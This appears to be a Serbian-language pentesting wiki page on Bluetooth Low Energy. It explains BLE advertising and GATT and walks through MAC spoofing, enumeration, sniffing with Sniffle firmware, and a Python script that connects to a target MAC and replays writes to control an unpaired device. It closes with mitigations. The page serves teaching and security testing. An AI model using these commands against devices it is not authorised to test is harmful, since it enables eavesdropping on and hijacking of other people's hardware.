# Pentesting BLE - Bluetooth Low Energy

{{#include ../../banners/hacktricks-training.md}}

## Uvod

Dostupan od Bluetooth 4.0 specifikacije, BLE koristi samo 40 kanala, pokrivajući opseg od 2400 do 2483.5 MHz. Za razliku od toga, tradicionalni Bluetooth koristi 79 kanala u istom opsegu.

BLE uređaji komuniciraju slanjem **advertising packets** (**beacons**), ovi paketi emituju postojanje BLE uređaja drugim uređajima u blizini. Ovi beacon-i ponekad takođe **slaju podatke**.

Slušajući uređaj, takođe nazivan centralnim uređajem, može da odgovori na advertising paket sa **SCAN request** poslatim specifično oglašavajućem uređaju. **Response** na taj scan koristi istu strukturu kao i **advertising** paket sa dodatnim informacijama koje nisu stale u inicijalni advertising request, kao što je puno ime uređaja.

![](<../../images/image (152).png>)

Preamble bajt sinhronizuje frekvenciju, dok je četvorobajtna access address **connection identifier**, koja se koristi u scenarijima gde više uređaja pokušava da uspostavi konekcije na istim kanalima. Zatim, Protocol Data Unit (**PDU**) sadrži **advertising data**. Postoji nekoliko tipova PDU; najčešće korišćeni su ADV_NONCONN_IND i ADV_IND. Uređaji koriste **ADV_NONCONN_IND** tip PDU ako oni **ne prihvataju konekcije**, prenoseći podatke samo u advertising paketu. Uređaji koriste **ADV_IND** ako oni **dozvoljavaju konekcije** i **prestaju sa slanjem advertising** paketa kada je **veza** **uspostavljena**.

### GATT

Generic Attribute Profile (GATT) definiše kako uređaj treba da formatira i prenosi podatke. Kada analizirate površinu napada BLE uređaja, često ćete se fokusirati na GATT (ili GATTs), jer je to način na koji se pokreću funkcionalnosti uređaja i kako se podaci čuvaju, grupišu i menjaju. GATT navodi karakteristike, deskriptore i servise uređaja u tabeli kao vrednosti od 16- ili 32-bita. Karakteristika je vrednost podataka koja se šalje između centralnog uređaja i perifernog uređaja. Ove karakteristike mogu imati deskriptore koji pružaju dodatne informacije o njima. Karakteristike se često grupišu u servise ako su povezane sa izvršavanjem određene akcije.

## Enumeracija
```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up

# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
```
### GATTool

**GATTool** omogućava **uspostavljanje** **veze** sa drugim uređajem, navodeći njegove **karakteristike**, i čitajući i pišući njegove atribute.\
GATTTool može pokrenuti interactive shell pomoću opcije `-I`:
```bash
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle:
0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle:
0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]

# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)

# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16

# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
```
### Bettercap
```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported

# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```
## Sniffing i aktivno kontrolisanje nepariranih BLE uređaja

Mnogi jeftini BLE periferni uređaji ne primenjuju pairing/bonding. Bez bondinga, Link Layer encryption nikada nije omogućen, pa je ATT/GATT saobraćaj u cleartext-u. Off-path sniffer može pratiti vezu, dekodirati GATT operacije da bi saznao characteristic handles i vrednosti, i bilo koji obližnji host zatim može da se poveže i replay-uje te write-ove kako bi kontrolisao uređaj.

### Sniffing with Sniffle (CC26x2/CC1352)

Hardver: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) ponovo flashovan sa NCC Group-ovim Sniffle firmware-om.

Instalirajte Sniffle i njegov Wireshark extcap na Linux:
```bash
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
echo "[+] - Sniffle not installed! Installing at 1.10.0..."
sudo mkdir -p /opt/sniffle
sudo chown -R $USER:$USER /opt/sniffle
pushd /opt/sniffle
wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
tar xvf v1.10.0.tar.gz
# Install Wireshark extcap for user and root only
mkdir -p $HOME/.local/lib/wireshark/extcap
ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
sudo mkdir -p /root/.local/lib/wireshark/extcap
sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
popd
else
echo "[+] - Sniffle already installed at 1.10.0"
fi
```
Flash Sonoff with Sniffle firmware (pobrinite se da vaš serijski uređaj odgovara, npr. /dev/ttyUSB0):
```bash
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
```
Snimite u Wireshark preko Sniffle extcap i brzo pređite (pivot to state-changing writes) filtriranjem:
```text
_ws.col.info contains "Sent Write Command"
```
Ovo ističe ATT Write Commands od klijenta; handle i value često direktno mapiraju na radnje uređaja (npr. write 0x01 na buzzer/alert characteristic, 0x00 za zaustavljanje).

Sniffle CLI — brzi primeri:
```bash
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
```
Alternativni sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin also works. Na malim/jeftinim Nordic dongles obično prepisujete USB bootloader da biste učitali sniffer firmware, pa ili zadržite namenski sniffer dongle ili vam treba J-Link/JTAG da kasnije vratite bootloader.

### Aktivna kontrola preko GATT

Kada identifikujete writable characteristic handle i value iz sniffed traffic, povežite se kao bilo koji central i pošaljite isti write:

- Sa Nordic nRF Connect for Desktop (BLE app):
- Odaberite nRF52/nRF52840 dongle, scan i connect to the target.
- Pregledajte GATT database, pronađite target characteristic (često ima friendly name, npr., Alert Level).
- Izvršite Write sa sniffed bytes (npr., 01 za aktiviranje, 00 za zaustavljanje).

- Automatizujte na Windows sa Nordic dongle koristeći Python + blatann:
```python
import time
import blatann

# CONFIG
COM_PORT = "COM29"  # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00"  # Replace with your target MAC

target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")

# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()
print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
print("[!] Connection failed.")
ble_device.close()
raise SystemExit(1)

print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)

# Example: write 0x01/0x00 to a known handle
for service in peer.database.services:
for ch in service.characteristics:
if ch.handle == 0x000b:  # Replace with your handle
print("[!] Beeping.")
ch.write(b"\x01")
time.sleep(2)
print("[+] And relax.")
ch.write(b"\x00")

print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
```
### Operativne napomene i mitigacije

- Preporučuje se Sonoff+Sniffle na Linuxu za pouzdan channel hopping i connection following. Držite rezervni Nordic sniffer kao rezervu.
- Bez pairing/bonding, svaki napadač u blizini može posmatrati writes i replay/craft sopstvene na unauthenticated writable characteristics.
- Mitigacije: zahtevajte pairing/bonding i primenite encryption; podesite characteristic permissions da zahtevaju authenticated writes; minimizirajte unauthenticated writable characteristics; verifikujte GATT ACLs pomoću Sniffle/nRF Connect.

## References

- [Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
- [Sniffle – A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)
- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle)
- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p)
- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
- [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)

{{#include ../../banners/hacktricks-training.md}}